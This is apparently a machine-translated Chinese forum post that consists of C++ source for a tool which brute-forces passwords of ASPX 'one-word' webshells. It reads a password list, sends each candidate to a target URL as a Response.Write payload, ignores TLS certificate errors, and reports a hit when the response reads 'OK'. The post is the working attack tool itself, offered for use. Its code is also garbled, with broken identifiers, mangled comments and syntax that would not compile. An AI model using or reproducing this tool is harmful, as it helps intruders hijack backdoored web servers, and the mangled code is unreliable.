Go ASPX a word blasting tool

#include "stdafx.h" #include <stdio.h> #include <Windows.h> #include <stdlib.h> #include <string.h > #include <string> #include <winhttp.h> #pragma comment (lib, "Winhttp.lib") void banner ()//Display banner{ printf ("[-]:webshell Aspx crack T00ls\r\n[-]:welcome www.90sec.org\r\n");} int _tmain (int argc, _TCHAR * argv []) {DWORD dwsize = 0; LPSTR Pszoutbuffer; Lpbyte Lpheader, lpdata; LPCWSTR Host = argv[1]; LPCWSTR URL = Argv[2];char Buf[max_path] = {0}; Fgets Receive string file* fp;int i = 0;if (argc < 4)//if inlet length is less than 4{banner ();p rintf ("[-]:%s Host domain_url password_list\r\n", AR Gv[0]); return 0;} if (fp = _wfopen (argv[3],l "RB") = = NULL)//Open the file if it does not exist {printf ("File not found\r\n");//Print error return 0;} while ((Fgets (BUF,MAX_PATH,FP)))///note here, Fgets reads the file, the default line end will add a carriage return, I just stuck here all night {Buf[strlen (BUF)-2] = ' + '; That is, enter, replace hinternet hinternet = WinHttpOpen (L "HttpClient 1.0",//define Access Sessionswinhttp_access_type_default_proxy, winhttp_no_proxy_name,winhttp_no_proxy_bypass,0); if (hinternet = = NULL)//If the defined access sessions is empty {printf ("Failed to Initialize http sessions\r\n"); return 0;} Hinternet hconnect = Winhttpconnect (hinternet,//Initialize connection host,//define address internet_default_https_port,//default port 4430); if ( Hconnect = = null)//If empty, close WinHTTP handle {printf ("hconnect error\r\n"); Winhttpclosehandle (hinternet); return 0;} wchar* res = new Wchar[max_path + 1]; Frees memory, prepares to write data wsprintf (res,l "%s?%s=response.write (\" Ok\ "); Response.End () ", url,buf); Write the string into the variable that frees the memory hinternet hrequest = Winhttpopenrequest (hconnect,//Prepare the transfer, define a good format L "GET", res,l "http/1.1", Winhttp_no_ referer,winhttp_default_accept_types,winhttp_flag_secure| Winhttp_flag_refresh); if (hrequest = = NULL) {winhttpclosehandle (hinternet); Winhttpclosehandle (hconnect); return 0;}           DWORD Dwflags;dword dwbufflen = sizeof (dwFlags); Winhttpqueryoption (hrequest, Winhttp_option_security_flags,//Set query Options (LPVOID) &dwflags, &dwbufflen);d wflags |= security_flag_ignore_unknown_ca;dwflags |= security_flag_ignore_cert_date_invalid;dwflags |= SECURITY_FLAG_IGNORe_cert_cn_invalid;dwflags |= Security_flag_ignore_cert_wrong_usage; WinHttpSetOption (hrequest, Winhttp_option_security_flags,//SET options &dwflags, sizeof (dwFlags)); WinHttpSendRequest (hrequest,//Send data winhttp_no_additional_headers,0,winhttp_no_request_data,0,0,0) = = FALSE) {DWORD Err = GetLastError (); Winhttpclosehandle (hrequest); Winhttpclosehandle (Hconnect); Winhttpclosehandle (hinternet); return 0;} if (Winhttpreceiveresponse (hrequest,null) = = FALSE)//start reading corresponding {DWORD err = GetLastError (); Winhttpclosehandle (hrequest); Winhttpclosehandle (Hconnect); Winhttpclosehandle (hinternet); return 0;} DWORD dwsize = 0;if (! Winhttpquerydataavailable (hrequest, &dwsize))//Check if there is still data to accept printf ("Error%u in winhttpquerydataavailable.\n", GetLastError ()); WinHttpQueryHeaders (hrequest,//View HTTP response header winhttp_query_raw_headers_crlf,winhttp_header_name_by_index,null,& Dwsize,winhttp_no_header_index); Lpheader = (LPBYTE) HeapAlloc (GetProcessHeap (), 0, dwsize); WinHttpQueryHeaders (Hrequest, Winhttp_query_raw_headers_cRLF, Winhttp_header_name_by_index, Lpheader, &dwsize, Winhttp_no_header_index); HeapFree (GetProcessHeap (), 0, Lpheader);D word dwdownloaded = 0;pszoutbuffer = new Char[dwsize+1];if (!pszoutbuffer) { printf ("Out of memory\n");} ZeroMemory (Pszoutbuffer, dwsize+1); if (! WinHttpReadData (Hrequest, (LPVOID) Pszoutbuffer, dwsize, &dwdownloaded)) {printf ("Er Ror%u in winhttpreaddata.\n ", GetLastError ());} if (Strstr (Pszoutbuffer, "OK")) {printf ("Line:%d-->find password success:%s\n", ++i,buf); return 0;} else{printf ("Line:%d-->password not found:%s\n", ++i,buf);}} Delete[] pszoutbuffer;//delete[] Res;return 0;}

Go ASPX a word blasting tool